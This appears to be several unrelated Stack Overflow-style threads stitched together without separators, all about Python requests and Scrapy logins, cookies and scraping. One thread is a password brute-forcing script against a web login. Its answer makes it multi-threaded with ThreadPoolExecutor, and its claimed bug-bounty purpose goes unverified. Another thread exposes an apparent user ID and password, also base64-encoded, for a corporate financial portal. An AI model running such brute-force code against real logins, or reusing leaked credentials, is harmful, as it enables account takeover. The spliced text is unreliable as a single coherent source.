I am trying to scrape the server list from https://www.astrill.com/member-zone/tools/vpn-servers, which is for members only. A username, password and captcha are required. Everything works if I log in with a browser and copy the 'PHPSESSID' cookie, but I want to log in with Python. I download the captcha and enter it manually, yet I still cannot log in. Login URL: https://www.astrill.com/member-zone/log-in
Could anybody help me, please?
import os
from urllib.request import urlretrieve

import bs4
import requests

BASE_FOLDER = os.path.dirname(os.path.abspath(__file__))
SERVERS_URL = 'https://www.astrill.com/member-zone/tools/vpn-servers'
LOGIN_URL = 'https://www.astrill.com/member-zone/log-in'

def get_captcha(url):
    print(f'Scraping url: {url}')
    try:
        response = requests.get(url)
        response.raise_for_status()
    except Exception as e:
        print(type(e), e)
    if response.status_code == 200:
        print('Success!')
    page = response.content
    soup = bs4.BeautifulSoup(page, 'html.parser')
    captcha_url = soup.find('img', alt='captcha')['src']
    captcha_file = os.path.join(BASE_FOLDER, 'captcha.jpg')
    csrf_token = soup.find(id='csrf_token')
    print(csrf_token['value'])
    print(f'Captcha: {captcha_url}')
    print(response.headers)
    # fetches the captcha with a plain urlretrieve, outside any session
    urlretrieve(captcha_url, captcha_file)
    return csrf_token['value']

def login(url, csrf_token):
    captcha_text = input('Captcha: ')
    print(csrf_token)
    payload = {
        'action': 'log-in',
        'username': 'myusername#a.com',
        'password': '1111111',
        'captcha': captcha_text,
        '_random': 'l4r1b7hf4g',
        'csrf_token': csrf_token
    }
    session = requests.Session()
    post = session.post(url, data=payload)
    r = session.get(SERVERS_URL)
    print(r.text)
    print(r.cookies)

if __name__ == '__main__':
    csrf_token = get_captcha(LOGIN_URL)
    login(LOGIN_URL, csrf_token)
First of all, I was not sure about the payload fields to POST. They can easily be discovered with Firefox Developer Tools → Network, where you can see what your browser actually posts. The second thing I discovered was that I need to request the captcha file within the same session, with my headers and cookies. So my code now looks like the following, and it works! (Probably some header fields can be removed.)
import os

import bs4
import requests

BASE_FOLDER = os.path.dirname(os.path.abspath(__file__))
SERVERS_URL = 'https://www.astrill.com/member-zone/tools/vpn-servers'
LOGIN_URL = 'https://www.astrill.com/member-zone/log-in'

session = requests.Session()  # one session for the page, the captcha and the login

cookies = {}
headers = {
    'Host': 'www.astrill.com',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0',
    'Accept': 'application/json, text/javascript, */*; q=0.01',
    'Accept-Language': 'ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3',
    'Accept-Encoding': 'gzip, deflate, br',
    'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
    'X-Requested-With': 'XMLHttpRequest',
    'Content-Length': '169',
    'Origin': 'https://www.astrill.com',
    'Connection': 'keep-alive',
    'Referer': 'https://www.astrill.com/member-zone/log-in',
}
payload = {
    'action': 'log-in',
    'username': 'myusername#a.com',
    'password': '1111111',
    'remember_me': 0,
    'captcha': '',
    '_random': 'somerandom1',
    'csrf_token': ''
}

def get_captcha(url):
    print(f'Scraping url: {url}')
    try:
        response = session.get(url)
        response.raise_for_status()
    except Exception as e:
        print(type(e), e)
    if response.status_code == 200:
        print('Success!')
    page = response.content
    soup = bs4.BeautifulSoup(page, 'html.parser')
    captcha_url = soup.find('img', alt='captcha')['src']
    captcha_file = os.path.join(BASE_FOLDER, 'captcha.jpg')
    payload['csrf_token'] = soup.find(id='csrf_token')['value']
    print(f'csrf_token: {payload["csrf_token"]}')
    print(f'Captcha: {captcha_url}')
    cookies.update(response.cookies)
    # the captcha must be fetched within the same session, with the same cookies
    captcha_img = session.get(captcha_url, headers=headers, cookies=cookies)
    with open(captcha_file, 'wb') as file:
        file.write(captcha_img.content)
    payload['captcha'] = input('Captcha: ')

def login(url):
    post = session.post(url, data=payload, headers=headers, cookies=cookies)
    print(post.text)
    r = session.get(SERVERS_URL, cookies=cookies)
    print(r.text)
    print(r.cookies)

def main():
    get_captcha(LOGIN_URL)
    login(LOGIN_URL)

if __name__ == '__main__':
    main()
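A follow-up note: since requests.Session already stores the cookies from every response and sends them back automatically, the manual cookies dict is probably redundant. A trimmed sketch of the same flow (untested against the live site; it reuses the headers, payload and URL constants defined above):

session = requests.Session()  # cookies persist across all requests made through it

def minimal_login():
    # fetch the login page; the session stores PHPSESSID by itself
    page = session.get(LOGIN_URL, headers=headers)
    soup = bs4.BeautifulSoup(page.content, 'html.parser')
    payload['csrf_token'] = soup.find(id='csrf_token')['value']
    # fetch the captcha through the same session so it matches our cookie
    img = session.get(soup.find('img', alt='captcha')['src'], headers=headers)
    with open('captcha.jpg', 'wb') as f:
        f.write(img.content)
    payload['captcha'] = input('Captcha: ')
    session.post(LOGIN_URL, data=payload, headers=headers)
    return session.get(SERVERS_URL)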
I am creating a custom tool for login brute-forcing on a web application, for bug bounty hunting. I came across a bug on one web application and had to write my own tool to exploit it. This is not a complete tool, but I need a solution for the current code to add threads:
import requests

myname = 'admin'  # target username (placeholder)
proxies = None    # e.g. {'https': 'http://127.0.0.1:8080'} to route through a proxy

exploit = open('password.txt', 'r').readlines()

headers = {
    'Host': 'TARGET.COM',
    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'Accept-Language': 'en-US,en;q=0.5',
    'Connection': 'close',
    'Upgrade-Insecure-Requests': '1',
    'Sec-Fetch-Dest': 'iframe',
    'Sec-Fetch-Mode': 'navigate',
    'Sec-Fetch-Site': 'same-origin',
    'Sec-Fetch-User': '?1'
}

for line in exploit:
    params = {
        'execution': '111u9342',
        'client_id': 'client-23429df',
        'tab_id': '234324',
    }
    password = line.strip()
    http = requests.post('https://www.target.com/test',
                         params=params,
                         headers=headers,
                         data={'username': myname, 'password': password},
                         verify=False,
                         proxies=proxies)
    content = http.content

print("finished")
I am a beginner in Python.
You can use ThreadPoolExecutor:
from concurrent.futures import ThreadPoolExecutor
import requests

# ...other code parts (headers, myname, proxies) as in the question...

def base_post(url, params, headers, data, proxies, verify=False, timeout=10):
    response = requests.post(url, params=params, headers=headers, data=data,
                             proxies=proxies, verify=verify, timeout=timeout)
    return response

total_possibilities = []
exploit = open('password.txt', 'r').readlines()  # same wordlist as in the question

for line in exploit:
    params = {
        'execution': '111u9342',
        'client_id': 'client-23429df',
        'tab_id': '234324',
    }
    password = line.strip()
    total_possibilities.append({'url': "...",
                                'params': params,
                                'headers': headers,
                                'data': {'username': myname, 'password': password},
                                'verify': False,
                                'proxies': proxies})

results = []
with ThreadPoolExecutor(max_workers=3) as executor:
    for row in total_possibilities:
        results.append(executor.submit(base_post, **row))

print(results)
Don't forget to update "max_workers" based on your needs.
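Note that executor.submit returns Future objects, so print(results) only shows the futures themselves. To read the actual responses, call .result() on each future, for example with as_completed (a sketch reusing base_post from above):

from concurrent.futures import as_completed

with ThreadPoolExecutor(max_workers=3) as executor:
    futures = [executor.submit(base_post, **row) for row in total_possibilities]
    for future in as_completed(futures):
        response = future.result()  # re-raises any exception from the worker
        print(response.status_code, len(response.content))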
Here is my code:
import requests
from bs4 import BeautifulSoup

session = requests.Session()
headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0',
           'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
           'Accept-Language': 'en-US,en;q=0.5',
           'Connection': 'keep-alive',
           'Upgrade-Insecure-Requests': '1',
           'Cache-Control': 'max-age=0'}

def generating_data():
    main_url = 'https://opencorporates.com/users/sign_in'
    r1 = session.get(main_url, headers=headers)
    soup = BeautifulSoup(r1.text, 'html.parser')
    tokens = soup.find('meta', attrs={'name': 'csrf-token'})
    token = tokens.get('content')
    print(f'token is : {token}')
    print('Login!')
    datas = {
        'utf8': '✓',
        'authenticity_token': token,
        'user[email]': 'user',
        'user[password]': 'pass',
        'submit': ''
    }
    r2 = session.post('https://opencorporates.com/users/sign_in', headers=headers, data=datas, cookies=r1.cookies)
    r3 = session.get('https://opencorporates.com/companies?utf8=%E2%9C%93&q=above+and+beyond&commit=Go&jurisdiction_code=&utf8=%E2%9C%93&commit=Go =&controller=searches&action=search_companies&inactive=false&mode=best_fields&search_fields[]=name&branch=false&nonprofit=&order=score', headers=headers, cookies=r1.cookies)
    f = open('./res.html', 'w+')
    f.write(r3.text)
    f.close()

generating_data()
I already get the logged-in result if I print r2, but when I move to the next line, r3, it shows the page as if we are not logged in yet. Can anyone help? Thanks.
You need to remove the cookies=r1.cookies portion, since you are already using a session. What this does is overwrite the cookies collected from the response to r2 that would otherwise have been sent along with the request, and which might have been important for staying logged in. The same goes for r2. In general, you do not need to deal with cookies yourself when you are using a session with requests. Your code for generating_data() then becomes:
def generating_data():
    main_url = 'https://opencorporates.com/users/sign_in'
    r1 = session.get(main_url, headers=headers)
    soup = BeautifulSoup(r1.text, 'html.parser')
    tokens = soup.find('meta', attrs={'name': 'csrf-token'})
    token = tokens.get('content')
    print(f'token is : {token}')
    print('Login!')
    datas = {
        'utf8': '✓',
        'authenticity_token': token,
        'user[email]': 'user',
        'user[password]': 'pass',
        'submit': ''
    }
    r2 = session.post('https://opencorporates.com/users/sign_in', headers=headers, data=datas)
    r3 = session.get('https://opencorporates.com/companies?utf8=%E2%9C%93&q=above+and+beyond&commit=Go&jurisdiction_code=&utf8=%E2%9C%93&commit=Go =&controller=searches&action=search_companies&inactive=false&mode=best_fields&search_fields[]=name&branch=false&nonprofit=&order=score', headers=headers)
    f = open('./res.html', 'w+')
    f.write(r3.text)
    f.close()
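If you want to convince yourself that the session is carrying the cookies for you, inspect its cookie jar after the login POST (a quick check; the cookie names themselves depend on the site):

r2 = session.post('https://opencorporates.com/users/sign_in', headers=headers, data=datas)
print(session.cookies.get_dict())  # cookies from r1 and r2, sent automatically from now on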
There is a URL: https://maps.leicester.gov.uk/map/Aurora.svc/run?inspect_query=QPPRN&inspect_value=ROH9385&script=%5CAurora%5Cw3%5CPLANNING%5Cw3PlanApp_MG.AuroraScript%24&nocache=f73eee56-45da-f708-87e7-42e82982370f&resize=always
It returns the coordinates. To get them, it makes three requests (I suppose):
1. the URL mentioned above;
2. requesting a session_id;
3. getting the coordinates using the previously obtained session_id.
I get a session_id in the 2nd step, but it is wrong: I can't get the coordinates in step 3 using it. How do I know the problem is the session_id? When I insert the session_id taken from the browser, my code works fine and the coordinates are received.
(Screenshots were attached here showing the requests in the browser, the correct response from the browser, and the response my code gets instead.)
Here is my code (it is for the Scrapy framework):
import re
import time

import scrapy
import inline_requests

@inline_requests.inline_requests
def get_map_data(self, response):
    """ Getting map data (a method of a scrapy.Spider subclass). """
    map_referer = ("https://maps.leicester.gov.uk/map/Aurora.svc/run?inspect_query=QPPRN&"
                   "inspect_value=ROH9385&script=%5CAurora%5Cw3%5CPLANNING%5Cw3PlanApp_MG.AuroraScript"
                   "%24&nocache=f73eee56-45da-f708-87e7-42e82982370f&resize=always")
    response = yield scrapy.Request(
        url=map_referer,
        meta=response.meta,
        method='GET',
        dont_filter=True,
    )
    time_str = str(int(time.time() * 1000))
    headers = {
        'Referer': response.url,
        'Accept': 'application/javascript, */*; q=0.8',
        'Accept-Encoding': 'gzip, deflate',
        'Accept-Language': 'ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7',
        'Host': 'maps.leicester.gov.uk',
        'Sec-Fetch-Dest': 'script',
        'Sec-Fetch-Mode': 'no-cors',
        'Sec-Fetch-Site': 'same-origin',
        'Connection': 'keep-alive',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36'
    }
    response.meta['handle_httpstatus_all'] = True
    url = ('https://maps.leicester.gov.uk/map/Aurora.svc/RequestSession?userName=inguest'
           '&password=&script=%5CAurora%5Cw3%5CPLANNING%5Cw3PlanApp_MG.AuroraScript%24&'
           f'callback=_jqjsp&_{time_str}=')
    request_session_response = yield scrapy.Request(
        url=url,
        meta=response.meta,
        method='GET',
        headers=headers,
        dont_filter=True,
    )
    session_id = re.search(r'"SessionId":"([^"]+)', request_session_response.text)
    session_id = session_id.group(1) if session_id else None
    print(session_id)
    # session_id = '954f04e2-e52c-4dd9-9046-f3f013d3f633'  # taken from the browser - works
    # pprn = item.get('other', {}).get('PPRN')
    pprn = 'ROH9385'  # hard-coded for the current page
    if session_id and pprn:
        time_str = str(int(time.time() * 1000))
        url = ('https://maps.leicester.gov.uk/map/Aurora.svc/FindValue'
               f'Location?sessionId={session_id}&value={pprn}&query=QPPRN&callback=_jqjsp'
               f'&_{time_str}=')
        coords_response = yield scrapy.Request(
            url=url,
            method='GET',
            meta=request_session_response.meta,
            dont_filter=True,
        )
        print(coords_response.text)
Could you please correct my code so that it can get the coordinates?
The website creates a sessionId first, then uses that sessionId to create a layer on the server (I guess). Only then can you start requesting; otherwise it can't find the map layer under that sessionId.
import requests

# 1. request a session id
url = "https://maps.leicester.gov.uk/map/Aurora.svc/RequestSession?userName=inguest&password=&script=%5CAurora%5Cw3%5CPLANNING%5Cw3PlanApp_MG.AuroraScript%24"
res = requests.get(url, verify=False).json()
sid = res["Session"]["SessionId"]

# 2. open the script map (creates the layer for this session)
url = f"https://maps.leicester.gov.uk/map/Aurora.svc/OpenScriptMap?sessionId={sid}"
res = requests.get(url, verify=False)

# 3. query the location
url = f"https://maps.leicester.gov.uk/map/Aurora.svc/FindValueLocation?sessionId={sid}&value=ROH9385&query=QPPRN"
res = requests.get(url, verify=False).json()
print(res)
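Since verify=False makes urllib3 emit an InsecureRequestWarning on every request, you may want to silence it while testing:

import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)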
I did some research on Python requests, passing XML parameters, but without much success on this specific page: I cannot log in. If someone has had a similar experience, any direction or help is welcome. My code follows:
import requests
from bs4 import BeautifulSoup

def main():
    # 'https://plataformafinanceira.xxxxxxxxbr.corp/xxxxxxxxcdc/login/login.html?timestamp=1478706683443?redirect=true'
    # 'LOGIN:Login'
    s = requests.Session()
    headers = {
        'Accept': 'application/xml, text/xml, */*',
        'Accept-Encoding': 'gzip, deflate, br',
        'Accept-Language': 'en-US,en;q=0.9',
        'Connection': 'Keep-Alive',
        'Content-Type': 'text/xml',
        'Host': 'plataformafinanceira.xxxxxxxxbr.corp',
        'Referer': 'https://plataformafinanceira.xxxxxxxxbr.corp/xxxxxxxxcdc/login/login.html?redirect=true',
        'X-Requested-With': 'XMLHttpRequest',
        'User-Agent': 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E)'
    }
    url = 'https://plataformafinanceira.xxxxxxxxbr.corp/xxxxxxxxcdc/login/login.html?timestamp=1478706683443?redirect=true'
    r = s.get(url, headers=headers, verify=False)
    print('************************************')
    print(r.status_code)
    print(r.cookies.get_dict())
    print('************************************')
    cookies = r.cookies.get_dict()
    xml = '''<?xml version="1.0" encoding="ISO-8859-1"?>
<request>
    <login type="group">
        <row>
            <id_user><![CDATA[x050432]]></id_user>
            <ds_password><![CDATA[NDY0NnBvcnQ=]]></ds_password>
            <version><![CDATA[2]]></version>
        </row>
    </login>
</request>'''
    payload = {
        'id_user': 'x050432',
        'txtcd_Pwd': '4646port',
        'version': '2'
    }
    url = 'https://plataformafinanceira.xxxxxxxxbr.corp/xxxxxxxxcdc/common/callService.do?name=LOGIN:Login-%3Elogin'
    r = s.post(url, headers=headers, auth=('x050432', '4646port'), cookies=cookies, verify=False)
    print('++++++++++++++++++++++++++++++++++++')
    print(r.status_code)
    print(r.cookies.get_dict())
    print('++++++++++++++++++++++++++++++++++++')
    # other attempts:
    # r = s.post(url, headers=headers, auth=('x050432', '4646port'), data=payload, cookies=cookies)
    # r = s.post(url, headers=headers, data=payload, cookies=cookies, verify=False)
    # url = 'https://plataformafinanceira.xxxxxxxxbr.corp/xxxxxxxxcdc/login/iframePrincipal.html?funcao=index&timestamp=1562604252980'
    # r = s.post(url, headers=headers, cookies=cookies, verify=False)
    # print(r.status_code)
    # print(r.cookies.get_dict())
    # print(r.text)
    with open('portal.html', 'w') as f:
        f.write(r.text)
    # InsecureRequestWarning: Unverified HTTPS request is being made. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#ssl-warnings
    # url = 'https://plataformafinanceira.xxxxxxxxbr.corp/xxxxxxxxcdc/login/login.html'

if __name__ == '__main__':
    main()
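One thing that stands out: the xml string is built but never sent, while the Content-Type: text/xml header suggests the service expects an XML body. A hedged sketch of posting it (assuming the endpoint really consumes this payload):

r = s.post(url, headers=headers,
           data=xml.encode('iso-8859-1'),  # send the XML document as the request body
           cookies=cookies, verify=False)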
I am trying to download a file with Python using requests.Session in order to take cookies into account.
The following code returns the source code of the second web page but does not download the file, even though I have included the headers and the parameters...
I am running out of ideas to find the problem here...
import requests

s = requests.Session()
url_euronex = "https://www.euronext.com/equities/directory"
response = s.get(url_euronex)
response_code = response.status_code
if response_code == 200:
    content = response.text
    token = content[content.index('formKey=nyx_pd_filter_values:') + 29 : content.index('dataTableInitCallback') - 3]
    url = "https://www.euronext.com/fr/popup/data/download?ml=nyx_pd_stocks&cmd=default&formKey=nyx_pd_filter_values%3A" + str(token)
    print(url)
    headers = {
        'Host': 'www.euronext.com',
        'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:56.0) Gecko/20100101 Firefox/56.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Accept-Language': 'en-US,en;q=0.5',
        'Accept-Encoding': 'gzip, deflate, br',
        'Referer': url,
        'Content-Type': 'application/x-www-form-urlencoded',
        'Content-Length': '135',
        'Connection': 'keep-alive',
        'Upgrade-Insecure-Requests': '1'}
    Params = {'Query string': {'ml': 'nyx_pd_stocks', 'cmd': 'default', 'formKey': 'nyx_pd_filter_values:' + str(token)},
              'Form data': {'format': '3', 'layout': '2', 'decimal_separator': '1', 'date_format': '1', 'op': 'Go', 'form_build_id': 'form-64080cce1044e288464d174290cb40e9', 'form_id': 'nyx_download_form'}}
    data = [{'url': url, 'params': Params, 'method': 'post'}]
    r = s.post(url, json=data, headers=headers)
    if r.status_code == 200:
        print('coucou')
        # resultat = (r.text).encode('utf-8')
        print(r.text)
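One likely problem here: the headers declare Content-Type: application/x-www-form-urlencoded, but json=data sends a JSON body, and the nested 'Query string'/'Form data' structure is DevTools presentation rather than something the server understands. A hedged sketch of posting only the form fields as form data (field names copied from the Params dict above):

form_data = {'format': '3', 'layout': '2', 'decimal_separator': '1',
             'date_format': '1', 'op': 'Go',
             'form_build_id': 'form-64080cce1044e288464d174290cb40e9',
             'form_id': 'nyx_download_form'}
r = s.post(url, data=form_data, headers=headers)  # requests builds the urlencoded body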